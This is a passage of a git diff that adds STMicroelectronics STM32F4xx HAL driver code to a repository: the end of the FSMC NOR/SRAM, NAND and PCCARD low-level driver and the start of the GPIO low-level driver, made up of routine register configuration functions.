Init->WriteOperation |\ + Init->WaitSignal |\ + Init->ExtendedMode |\ + Init->AsynchronousWait |\ + Init->WriteBurst |\ + Init->ContinuousClock |\ + Init->PageSize |\ + Init->WriteFifo); +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx */ + + if(Init->MemoryType == FSMC_MEMORY_TYPE_NOR) + { + tmpr |= (uint32_t)FSMC_NORSRAM_FLASH_ACCESS_ENABLE; + } + + Device->BTCR[Init->NSBank] = tmpr; + +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Configure synchronous mode when Continuous clock is enabled for bank2..4 */ + if((Init->ContinuousClock == FSMC_CONTINUOUS_CLOCK_SYNC_ASYNC) && (Init->NSBank != FSMC_NORSRAM_BANK1)) + { + Device->BTCR[FSMC_NORSRAM_BANK1] |= (uint32_t)(Init->ContinuousClock); + } + + if(Init->NSBank != FSMC_NORSRAM_BANK1) + { + Device->BTCR[FSMC_NORSRAM_BANK1] |= (uint32_t)(Init->WriteFifo); + } +#endif /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F413xx || STM32F423xx */ + + return HAL_OK; +} + +/** + * @brief DeInitialize the FSMC_NORSRAM peripheral + * @param Device Pointer to NORSRAM device instance + * @param ExDevice Pointer to NORSRAM extended mode device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_DeInit(FSMC_NORSRAM_TypeDef *Device, FSMC_NORSRAM_EXTENDED_TypeDef *ExDevice, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FSMC_NORSRAM_EXTENDED_DEVICE(ExDevice)); + assert_param(IS_FSMC_NORSRAM_BANK(Bank)); + + /* Disable the FSMC_NORSRAM device */ + __FSMC_NORSRAM_DISABLE(Device, Bank); + + /* De-initialize the FSMC_NORSRAM device */ + /* FSMC_NORSRAM_BANK1 */ + if(Bank == FSMC_NORSRAM_BANK1) + { + Device->BTCR[Bank] = 0x000030DBU; + } + /* FSMC_NORSRAM_BANK2, FSMC_NORSRAM_BANK3 or FSMC_NORSRAM_BANK4 */ + else + { + Device->BTCR[Bank] = 0x000030D2U; + } + + Device->BTCR[Bank + 1U] = 0x0FFFFFFFU; + ExDevice->BWTR[Bank] = 0x0FFFFFFFU; + + return HAL_OK; +} + + +/** + * @brief Initialize the FSMC_NORSRAM Timing according to the specified + * parameters in the FSMC_NORSRAM_TimingTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Timing Pointer to NORSRAM Timing structure + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_Timing_Init(FSMC_NORSRAM_TypeDef *Device, FSMC_NORSRAM_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FSMC_ADDRESS_SETUP_TIME(Timing->AddressSetupTime)); + assert_param(IS_FSMC_ADDRESS_HOLD_TIME(Timing->AddressHoldTime)); + assert_param(IS_FSMC_DATASETUP_TIME(Timing->DataSetupTime)); + assert_param(IS_FSMC_TURNAROUND_TIME(Timing->BusTurnAroundDuration)); + assert_param(IS_FSMC_CLK_DIV(Timing->CLKDivision)); + assert_param(IS_FSMC_DATA_LATENCY(Timing->DataLatency)); + assert_param(IS_FSMC_ACCESS_MODE(Timing->AccessMode)); + assert_param(IS_FSMC_NORSRAM_BANK(Bank)); + + /* Get the BTCR register value */ + tmpr = Device->BTCR[Bank + 1U]; + + /* Clear ADDSET, ADDHLD, DATAST, BUSTURN, CLKDIV, DATLAT and ACCMOD bits */ + tmpr &= ((uint32_t)~(FSMC_BTR1_ADDSET | FSMC_BTR1_ADDHLD | FSMC_BTR1_DATAST | \ + FSMC_BTR1_BUSTURN | FSMC_BTR1_CLKDIV | FSMC_BTR1_DATLAT | \ + FSMC_BTR1_ACCMOD)); + + /* Set FSMC_NORSRAM device timing parameters */ + tmpr |= (uint32_t)(Timing->AddressSetupTime |\ + ((Timing->AddressHoldTime) << 4U) |\ + ((Timing->DataSetupTime) << 8U) |\ + ((Timing->BusTurnAroundDuration) << 16U) |\ + (((Timing->CLKDivision)-1U) << 20U) |\ + (((Timing->DataLatency)-2U) << 24U) |\ + (Timing->AccessMode)); + + Device->BTCR[Bank + 1] = tmpr; + +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Configure Clock division value (in NORSRAM bank 1) when continuous clock is enabled */ + if(HAL_IS_BIT_SET(Device->BTCR[FSMC_NORSRAM_BANK1], FSMC_BCR1_CCLKEN)) + { + tmpr = (uint32_t)(Device->BTCR[FSMC_NORSRAM_BANK1 + 1U] & ~(0x0FU << 20U)); + tmpr |= (uint32_t)(((Timing->CLKDivision)-1U) << 20U); + Device->BTCR[FSMC_NORSRAM_BANK1 + 1U] = tmpr; + } +#endif /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F413xx || STM32F423xx */ + + return HAL_OK; +} + +/** + * @brief Initialize the FSMC_NORSRAM Extended mode Timing according to the specified + * parameters in the FSMC_NORSRAM_TimingTypeDef + * @param Device Pointer to NORSRAM device instance + * @param Timing Pointer to NORSRAM Timing structure + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_Extended_Timing_Init(FSMC_NORSRAM_EXTENDED_TypeDef *Device, FSMC_NORSRAM_TimingTypeDef *Timing, uint32_t Bank, uint32_t ExtendedMode) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_EXTENDED_MODE(ExtendedMode)); + + /* Set NORSRAM device timing register for write configuration, if extended mode is used */ + if(ExtendedMode == FSMC_EXTENDED_MODE_ENABLE) + { + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_EXTENDED_DEVICE(Device)); + assert_param(IS_FSMC_ADDRESS_SETUP_TIME(Timing->AddressSetupTime)); + assert_param(IS_FSMC_ADDRESS_HOLD_TIME(Timing->AddressHoldTime)); + assert_param(IS_FSMC_DATASETUP_TIME(Timing->DataSetupTime)); + assert_param(IS_FSMC_TURNAROUND_TIME(Timing->BusTurnAroundDuration)); + assert_param(IS_FSMC_ACCESS_MODE(Timing->AccessMode)); + assert_param(IS_FSMC_NORSRAM_BANK(Bank)); + + /* Get the BWTR register value */ + tmpr = Device->BWTR[Bank]; + + /* Clear ADDSET, ADDHLD, DATAST, BUSTURN and ACCMOD bits */ + tmpr &= ((uint32_t)~(FSMC_BWTR1_ADDSET | FSMC_BWTR1_ADDHLD | FSMC_BWTR1_DATAST | \ + FSMC_BWTR1_BUSTURN | FSMC_BWTR1_ACCMOD)); + + tmpr |= (uint32_t)(Timing->AddressSetupTime |\ + ((Timing->AddressHoldTime) << 4U) |\ + ((Timing->DataSetupTime) << 8U) |\ + ((Timing->BusTurnAroundDuration) << 16U) |\ + (Timing->AccessMode)); + + Device->BWTR[Bank] = tmpr; + } + else + { + Device->BWTR[Bank] = 0x0FFFFFFFU; + } + + return HAL_OK; +} +/** + * @} + */ + +/** @addtogroup FSMC_LL_NORSRAM_Private_Functions_Group2 + * @brief management functions + * +@verbatim + ============================================================================== + ##### FSMC_NORSRAM Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FSMC NORSRAM interface. + +@endverbatim + * @{ + */ + +/** + * @brief Enables dynamically FSMC_NORSRAM write operation. + * @param Device Pointer to NORSRAM device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_WriteOperation_Enable(FSMC_NORSRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FSMC_NORSRAM_BANK(Bank)); + + /* Enable write operation */ + Device->BTCR[Bank] |= FSMC_WRITE_OPERATION_ENABLE; + + return HAL_OK; +} + +/** + * @brief Disables dynamically FSMC_NORSRAM write operation. + * @param Device Pointer to NORSRAM device instance + * @param Bank NORSRAM bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NORSRAM_WriteOperation_Disable(FSMC_NORSRAM_TypeDef *Device, uint32_t Bank) +{ + /* Check the parameters */ + assert_param(IS_FSMC_NORSRAM_DEVICE(Device)); + assert_param(IS_FSMC_NORSRAM_BANK(Bank)); + + /* Disable write operation */ + Device->BTCR[Bank] &= ~FSMC_WRITE_OPERATION_ENABLE; + + return HAL_OK; +} +/** + * @} + */ + +/** + * @} + */ + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) +/** @addtogroup FSMC_LL_NAND + * @brief NAND Controller functions + * + @verbatim + ============================================================================== + ##### How to use NAND device driver ##### + ============================================================================== + [..] + This driver contains a set of APIs to interface with the FSMC NAND banks in order + to run the NAND external devices. + + (+) FSMC NAND bank reset using the function FSMC_NAND_DeInit() + (+) FSMC NAND bank control configuration using the function FSMC_NAND_Init() + (+) FSMC NAND bank common space timing configuration using the function + FSMC_NAND_CommonSpace_Timing_Init() + (+) FSMC NAND bank attribute space timing configuration using the function + FSMC_NAND_AttributeSpace_Timing_Init() + (+) FSMC NAND bank enable/disable ECC correction feature using the functions + FSMC_NAND_ECC_Enable()/FSMC_NAND_ECC_Disable() + (+) FSMC NAND bank get ECC correction code using the function FSMC_NAND_GetECC() + +@endverbatim + * @{ + */ + +/** @addtogroup FSMC_LL_NAND_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FSMC NAND interface + (+) De-initialize the FSMC NAND interface + (+) Configure the FSMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FSMC_NAND device according to the specified + * control parameters in the FSMC_NAND_HandleTypeDef + * @param Device Pointer to NAND device instance + * @param Init Pointer to NAND Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_Init(FSMC_NAND_TypeDef *Device, FSMC_NAND_InitTypeDef *Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_NAND_BANK(Init->NandBank)); + assert_param(IS_FSMC_WAIT_FEATURE(Init->Waitfeature)); + assert_param(IS_FSMC_NAND_MEMORY_WIDTH(Init->MemoryDataWidth)); + assert_param(IS_FSMC_ECC_STATE(Init->EccComputation)); + assert_param(IS_FSMC_ECCPAGE_SIZE(Init->ECCPageSize)); + assert_param(IS_FSMC_TCLR_TIME(Init->TCLRSetupTime)); + assert_param(IS_FSMC_TAR_TIME(Init->TARSetupTime)); + + if(Init->NandBank == FSMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PCR2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PCR3; + } + + /* Clear PWAITEN, PBKEN, PTYP, PWID, ECCEN, TCLR, TAR and ECCPS bits */ + tmpr &= ((uint32_t)~(FSMC_PCR2_PWAITEN | FSMC_PCR2_PBKEN | FSMC_PCR2_PTYP | \ + FSMC_PCR2_PWID | FSMC_PCR2_ECCEN | FSMC_PCR2_TCLR | \ + FSMC_PCR2_TAR | FSMC_PCR2_ECCPS)); + + /* Set NAND device control parameters */ + tmpr |= (uint32_t)(Init->Waitfeature |\ + FSMC_PCR_MEMORY_TYPE_NAND |\ + Init->MemoryDataWidth |\ + Init->EccComputation |\ + Init->ECCPageSize |\ + ((Init->TCLRSetupTime) << 9U) |\ + ((Init->TARSetupTime) << 13U)); + + if(Init->NandBank == FSMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PCR2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PCR3 = tmpr; + } + + return HAL_OK; +} + +/** + * @brief Initializes the FSMC_NAND Common space Timing according to the specified + * parameters in the FSMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_CommonSpace_Timing_Init(FSMC_NAND_TypeDef *Device, FSMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FSMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FSMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FSMC_HIZ_TIME(Timing->HiZSetupTime)); + + if(Bank == FSMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PMEM2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PMEM3; + } + + /* Clear MEMSETx, MEMWAITx, MEMHOLDx and MEMHIZx bits */ + tmpr &= ((uint32_t)~(FSMC_PMEM2_MEMSET2 | FSMC_PMEM2_MEMWAIT2 | FSMC_PMEM2_MEMHOLD2 | \ + FSMC_PMEM2_MEMHIZ2)); + + /* Set FSMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U) + ); + + if(Bank == FSMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PMEM2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PMEM3 = tmpr; + } + + return HAL_OK; +} + +/** + * @brief Initializes the FSMC_NAND Attribute space Timing according to the specified + * parameters in the FSMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to NAND device instance + * @param Timing Pointer to NAND timing structure + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_AttributeSpace_Timing_Init(FSMC_NAND_TypeDef *Device, FSMC_NAND_PCC_TimingTypeDef *Timing, uint32_t Bank) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FSMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FSMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FSMC_HIZ_TIME(Timing->HiZSetupTime)); + + if(Bank == FSMC_NAND_BANK2) + { + /* Get the NAND bank 2 register value */ + tmpr = Device->PATT2; + } + else + { + /* Get the NAND bank 3 register value */ + tmpr = Device->PATT3; + } + + /* Clear ATTSETx, ATTWAITx, ATTHOLDx and ATTHIZx bits */ + tmpr &= ((uint32_t)~(FSMC_PATT2_ATTSET2 | FSMC_PATT2_ATTWAIT2 | FSMC_PATT2_ATTHOLD2 | \ + FSMC_PATT2_ATTHIZ2)); + + /* Set FSMC_NAND device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U) + ); + + if(Bank == FSMC_NAND_BANK2) + { + /* NAND bank 2 registers configuration */ + Device->PATT2 = tmpr; + } + else + { + /* NAND bank 3 registers configuration */ + Device->PATT3 = tmpr; + } + + return HAL_OK; +} + +/** + * @brief DeInitializes the FSMC_NAND device + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_DeInit(FSMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Disable the NAND Bank */ + __FSMC_NAND_DISABLE(Device, Bank); + + /* De-initialize the NAND Bank */ + if(Bank == FSMC_NAND_BANK2) + { + /* Set the FSMC_NAND_BANK2 registers to their reset values */ + Device->PCR2 = 0x00000018U; + Device->SR2 = 0x00000040U; + Device->PMEM2 = 0xFCFCFCFCU; + Device->PATT2 = 0xFCFCFCFCU; + } + /* FSMC_Bank3_NAND */ + else + { + /* Set the FSMC_NAND_BANK3 registers to their reset values */ + Device->PCR3 = 0x00000018U; + Device->SR3 = 0x00000040U; + Device->PMEM3 = 0xFCFCFCFCU; + Device->PATT3 = 0xFCFCFCFCU; + } + + return HAL_OK; +} +/** + * @} + */ + +/** @addtogroup FSMC_LL_NAND_Private_Functions_Group2 + * @brief management functions + * +@verbatim + ============================================================================== + ##### FSMC_NAND Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the FSMC NAND interface. + +@endverbatim + * @{ + */ + +/** + * @brief Enables dynamically FSMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_ECC_Enable(FSMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Enable ECC feature */ + if(Bank == FSMC_NAND_BANK2) + { + Device->PCR2 |= FSMC_PCR2_ECCEN; + } + else + { + Device->PCR3 |= FSMC_PCR3_ECCEN; + } + + return HAL_OK; +} + +/** + * @brief Disables dynamically FSMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param Bank NAND bank number + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_ECC_Disable(FSMC_NAND_TypeDef *Device, uint32_t Bank) +{ + /* Disable ECC feature */ + if(Bank == FSMC_NAND_BANK2) + { + Device->PCR2 &= ~FSMC_PCR2_ECCEN; + } + else + { + Device->PCR3 &= ~FSMC_PCR3_ECCEN; + } + + return HAL_OK; +} + +/** + * @brief Disables dynamically FSMC_NAND ECC feature. + * @param Device Pointer to NAND device instance + * @param ECCval Pointer to ECC value + * @param Bank NAND bank number + * @param Timeout Timeout wait value + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_NAND_GetECC(FSMC_NAND_TypeDef *Device, uint32_t *ECCval, uint32_t Bank, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_NAND_DEVICE(Device)); + assert_param(IS_FSMC_NAND_BANK(Bank)); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until FIFO is empty */ + while(__FSMC_NAND_GET_FLAG(Device, Bank, FSMC_FLAG_FEMPT) == RESET) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + return HAL_TIMEOUT; + } + } + } + + if(Bank == FSMC_NAND_BANK2) + { + /* Get the ECCR2 register value */ + *ECCval = (uint32_t)Device->ECCR2; + } + else + { + /* Get the ECCR3 register value */ + *ECCval = (uint32_t)Device->ECCR3; + } + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup FSMC_LL_PCCARD + * @brief PCCARD Controller functions + * + @verbatim + ============================================================================== + ##### How to use PCCARD device driver ##### + ============================================================================== + [..] + This driver contains a set of APIs to interface with the FSMC PCCARD bank in order + to run the PCCARD/compact flash external devices. + + (+) FSMC PCCARD bank reset using the function FSMC_PCCARD_DeInit() + (+) FSMC PCCARD bank control configuration using the function FSMC_PCCARD_Init() + (+) FSMC PCCARD bank common space timing configuration using the function + FSMC_PCCARD_CommonSpace_Timing_Init() + (+) FSMC PCCARD bank attribute space timing configuration using the function + FSMC_PCCARD_AttributeSpace_Timing_Init() + (+) FSMC PCCARD bank IO space timing configuration using the function + FSMC_PCCARD_IOSpace_Timing_Init() + +@endverbatim + * @{ + */ + +/** @addtogroup FSMC_LL_PCCARD_Private_Functions_Group1 + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the FSMC PCCARD interface + (+) De-initialize the FSMC PCCARD interface + (+) Configure the FSMC clock and associated GPIOs + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the FSMC_PCCARD device according to the specified + * control parameters in the FSMC_PCCARD_HandleTypeDef + * @param Device Pointer to PCCARD device instance + * @param Init Pointer to PCCARD Initialization structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_PCCARD_Init(FSMC_PCCARD_TypeDef *Device, FSMC_PCCARD_InitTypeDef *Init) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_WAIT_FEATURE(Init->Waitfeature)); + assert_param(IS_FSMC_TCLR_TIME(Init->TCLRSetupTime)); + assert_param(IS_FSMC_TAR_TIME(Init->TARSetupTime)); + + /* Get PCCARD control register value */ + tmpr = Device->PCR4; + + /* Clear TAR, TCLR, PWAITEN and PWID bits */ + tmpr &= ((uint32_t)~(FSMC_PCR4_TAR | FSMC_PCR4_TCLR | FSMC_PCR4_PWAITEN | \ + FSMC_PCR4_PWID | FSMC_PCR4_PTYP)); + + /* Set FSMC_PCCARD device control parameters */ + tmpr |= (uint32_t)(Init->Waitfeature |\ + FSMC_NAND_PCC_MEM_BUS_WIDTH_16 |\ + (Init->TCLRSetupTime << 9U) |\ + (Init->TARSetupTime << 13U)); + + Device->PCR4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FSMC_PCCARD Common space Timing according to the specified + * parameters in the FSMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_PCCARD_CommonSpace_Timing_Init(FSMC_PCCARD_TypeDef *Device, FSMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FSMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FSMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FSMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get PCCARD common space timing register value */ + tmpr = Device->PMEM4; + + /* Clear MEMSETx, MEMWAITx, MEMHOLDx and MEMHIZx bits */ + tmpr &= ((uint32_t)~(FSMC_PMEM4_MEMSET4 | FSMC_PMEM4_MEMWAIT4 | FSMC_PMEM4_MEMHOLD4 | \ + FSMC_PMEM4_MEMHIZ4)); + /* Set PCCARD timing parameters */ + tmpr |= (uint32_t)((Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + (Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + Device->PMEM4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FSMC_PCCARD Attribute space Timing according to the specified + * parameters in the FSMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_PCCARD_AttributeSpace_Timing_Init(FSMC_PCCARD_TypeDef *Device, FSMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FSMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FSMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FSMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get PCCARD timing parameters */ + tmpr = Device->PATT4; + + /* Clear ATTSETx, ATTWAITx, ATTHOLDx and ATTHIZx bits */ + tmpr &= ((uint32_t)~(FSMC_PATT4_ATTSET4 | FSMC_PATT4_ATTWAIT4 | FSMC_PATT4_ATTHOLD4 | \ + FSMC_PATT4_ATTHIZ4)); + + /* Set PCCARD timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + Device->PATT4 = tmpr; + + return HAL_OK; +} + +/** + * @brief Initializes the FSMC_PCCARD IO space Timing according to the specified + * parameters in the FSMC_NAND_PCC_TimingTypeDef + * @param Device Pointer to PCCARD device instance + * @param Timing Pointer to PCCARD timing structure + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_PCCARD_IOSpace_Timing_Init(FSMC_PCCARD_TypeDef *Device, FSMC_NAND_PCC_TimingTypeDef *Timing) +{ + uint32_t tmpr = 0U; + + /* Check the parameters */ + assert_param(IS_FSMC_SETUP_TIME(Timing->SetupTime)); + assert_param(IS_FSMC_WAIT_TIME(Timing->WaitSetupTime)); + assert_param(IS_FSMC_HOLD_TIME(Timing->HoldSetupTime)); + assert_param(IS_FSMC_HIZ_TIME(Timing->HiZSetupTime)); + + /* Get FSMC_PCCARD device timing parameters */ + tmpr = Device->PIO4; + + /* Clear IOSET4, IOWAIT4, IOHOLD4 and IOHIZ4 bits */ + tmpr &= ((uint32_t)~(FSMC_PIO4_IOSET4 | FSMC_PIO4_IOWAIT4 | FSMC_PIO4_IOHOLD4 | \ + FSMC_PIO4_IOHIZ4)); + + /* Set FSMC_PCCARD device timing parameters */ + tmpr |= (uint32_t)(Timing->SetupTime |\ + ((Timing->WaitSetupTime) << 8U) |\ + ((Timing->HoldSetupTime) << 16U) |\ + ((Timing->HiZSetupTime) << 24U)); + + Device->PIO4 = tmpr; + + return HAL_OK; +} + +/** + * @brief DeInitializes the FSMC_PCCARD device + * @param Device Pointer to PCCARD device instance + * @retval HAL status + */ +HAL_StatusTypeDef FSMC_PCCARD_DeInit(FSMC_PCCARD_TypeDef *Device) +{ + /* Disable the FSMC_PCCARD device */ + __FSMC_PCCARD_DISABLE(Device); + + /* De-initialize the FSMC_PCCARD device */ + Device->PCR4 = 0x00000018U; + Device->SR4 = 0x00000000U; + Device->PMEM4 = 0xFCFCFCFCU; + Device->PATT4 = 0xFCFCFCFCU; + Device->PIO4 = 0xFCFCFCFCU; + + return HAL_OK; +} +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx */ + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F412Zx || STM32F412Vx || STM32F413xx || STM32F423xx */ +#endif /* HAL_SRAM_MODULE_ENABLED || HAL_NOR_MODULE_ENABLED || HAL_NAND_MODULE_ENABLED || HAL_PCCARD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_gpio.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_gpio.c new file mode 100644 index 000000000..bfdcb1e6e --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_gpio.c @@ -0,0 +1,305 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_gpio.c + * @author MCD Application Team + * @brief GPIO LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_gpio.h" +#include "stm32f4xx_ll_bus.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (GPIOA) || defined (GPIOB) || defined (GPIOC) || defined (GPIOD) || defined (GPIOE) || defined (GPIOF) || defined (GPIOG) || defined (GPIOH) || defined (GPIOI) || defined (GPIOJ) || defined (GPIOK) + +/** @addtogroup GPIO_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup GPIO_LL_Private_Macros + * @{ + */ +#define IS_LL_GPIO_PIN(__VALUE__) (((0x00000000U) < (__VALUE__)) && ((__VALUE__) <= (LL_GPIO_PIN_ALL))) + +#define IS_LL_GPIO_MODE(__VALUE__) (((__VALUE__) == LL_GPIO_MODE_INPUT) ||\ + ((__VALUE__) == LL_GPIO_MODE_OUTPUT) ||\ + ((__VALUE__) == LL_GPIO_MODE_ALTERNATE) ||\ + ((__VALUE__) == LL_GPIO_MODE_ANALOG)) + +#define IS_LL_GPIO_OUTPUT_TYPE(__VALUE__) (((__VALUE__) == LL_GPIO_OUTPUT_PUSHPULL) ||\ + ((__VALUE__) == LL_GPIO_OUTPUT_OPENDRAIN)) + +#define IS_LL_GPIO_SPEED(__VALUE__) (((__VALUE__) == LL_GPIO_SPEED_FREQ_LOW) ||\ + ((__VALUE__) == LL_GPIO_SPEED_FREQ_MEDIUM) ||\ + ((__VALUE__) == LL_GPIO_SPEED_FREQ_HIGH) ||\ + ((__VALUE__) == LL_GPIO_SPEED_FREQ_VERY_HIGH)) + +#define IS_LL_GPIO_PULL(__VALUE__) (((__VALUE__) == LL_GPIO_PULL_NO) ||\ + ((__VALUE__) == LL_GPIO_PULL_UP) ||\ + ((__VALUE__) == LL_GPIO_PULL_DOWN)) + +#define IS_LL_GPIO_ALTERNATE(__VALUE__) (((__VALUE__) == LL_GPIO_AF_0 ) ||\ + ((__VALUE__) == LL_GPIO_AF_1 ) ||\ + ((__VALUE__) == LL_GPIO_AF_2 ) ||\ + ((__VALUE__) == LL_GPIO_AF_3 ) ||\ + ((__VALUE__) == LL_GPIO_AF_4 ) ||\ + ((__VALUE__) == LL_GPIO_AF_5 ) ||\ + ((__VALUE__) == LL_GPIO_AF_6 ) ||\ + 